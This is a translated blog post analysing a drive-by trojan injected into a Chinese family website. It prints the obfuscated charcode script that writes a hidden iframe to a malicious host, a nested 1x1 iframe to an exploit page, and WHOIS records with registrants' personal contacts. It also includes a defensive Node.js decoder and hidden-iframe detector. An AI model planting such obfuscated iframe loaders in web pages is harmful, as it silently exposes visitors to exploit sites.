First published on my blog: http://www.areway.cn/?p=175

Over the weekend, as soon as I came online, 鸭子 messaged me on QQ saying his site had been hit with a trojan injection (挂马). I didn't think much of it at the time and just opened the link directly. Here is a capture of the page source:
<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';t=eval('String.fromCharCode('+t+')');
document.write(t);</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Published By Newasp.cc 2007-12-7-18:03:23 -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>首页 - 爱生活家庭网
At the top there is a script block with a decimal-encoded payload. Roughly, it stores all the character codes in the variable t, decodes them with String.fromCharCode, and finally uses document.write(t) to write the decoded string into the page.

After converting the string, the content is roughly this (click it at your own risk):
<script>t='<iframe src=http://free.u-uuu.cn/error.htm width=………
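As an added example (not code from the original post), a small Node.js script that recovers the injected iframe from the captured script statically, without running eval, and then flags iframes sized to be invisible. The sample input is constructed from the two snippets quoted in this post; nothing is fetched from the network.

```javascript
// Added example, not from the original post: decode the String.fromCharCode
// injection captured above without eval, then flag iframes sized to be hidden.
// Constructed sample: the injected script and the nested iframe quoted in the post.
const CAPTURED = `<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>`;

// Find every t='1,2,3,...' list and decode it directly with String.fromCharCode.
// The original needs eval() only because it keeps the codes as a string; a
// defender can reproduce the payload statically without executing anything.
function decodeCharCodePayloads(html) {
  const payloads = [];
  const re = /t\s*=\s*'([\d\s,]+)'/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    const codes = m[1].split(',').map(s => s.trim()).filter(Boolean).map(Number);
    payloads.push(String.fromCharCode(...codes));
  }
  return payloads;
}

// Report iframes whose width or height is 0 or 1 pixel: a legitimate embed is
// rarely invisible, so these are the usual sign of a drive-by injection.
function findHiddenIframes(html) {
  const hidden = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const attr = name => {
      const a = new RegExp('\\b' + name + '\\s*=\\s*"?([^\\s">]+)', 'i').exec(attrs);
      return a ? a[1] : null;
    };
    const px = v => (v === null ? NaN : Number(v)); // missing attribute is not "hidden"
    const width = px(attr('width')), height = px(attr('height'));
    if (width <= 1 || height <= 1) { // NaN compares false, so absent sizes pass
      hidden.push({ src: attr('src'), width, height });
    }
  }
  return hidden;
}

// Decode first, then scan both the decoded payloads and the raw HTML.
function analyse(html) {
  const decoded = decodeCharCodePayloads(html);
  const hidden = [...decoded, html].flatMap(findHiddenIframes);
  return { decoded, hidden };
}

console.log(JSON.stringify(analyse(CAPTURED), null, 2));
```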
Whois details for the domain u-uuu.cn:

Domain Name: u-uuu.cn
ROID: 20070901s10001s64972306-cn
Domain Status: ok
Registrant Organization: 王雷
Registrant Name: 王雷
Administrative Email: czlovexs@126.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server: ns.yovole.com
Name Server: ns1.yovole.com
Registration Date: 2007-09-01 17:54
Expiration Date: 2008-09-01 17:54
Finally I pinged the address, and nothing came back.

I continued the analysis inside a virtual machine: opened the link above in IE and viewed the source. Straight away there was yet another nested one:
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>
This domain is quite possibly the trojan author's own.

Whois details for foafau.info:
Domain ID:D22418703-LRMS
Domain Name:FOAFAU.INFO
Created On:20-Nov-2007 16:05:42 UTC
Last Updated On:20-Nov-2007 16:05:44 UTC
Expiration Date:20-Nov-2008 16:05:42 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:GODA-040110615
Registrant Name:liu hong
Registrant Street1:beijing
Registrant City:beijing
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.860108888777
Registrant Email:bbbshiji@163.com
Admin ID:GODA-240110615
Admin Name:liu hong
Admin Street1:beijing
Admin City:beijing
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.860108888777
Admin Email:bbbshiji@163.com
Billing ID:GODA-340110615
Billing Name:liu hong
Billing Street1:beijing
Billing City:beijing
Billing Postal Code:100000
Billing Country:CN
Billing Phone:+86.860108888777
Billing Email:bbbshiji@163.com
Tech ID:GODA-140110615
Tech Name:liu hong
Tech Street1:beijing
Tech City:beijing
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.860108888777
Tech Email:bbbshiji@163.com
Name Server:NS27.DOMAINCONTROL.COM
Name Server:NS28.DOMAINCONTROL.COM
Next I downloaded the code from each of the files and went through it step by step.
It is all decimal-encoded code of the same kind, and I couldn't be bothered to analyse it any further. Anyone who enjoys this sort of thing can carry on from here.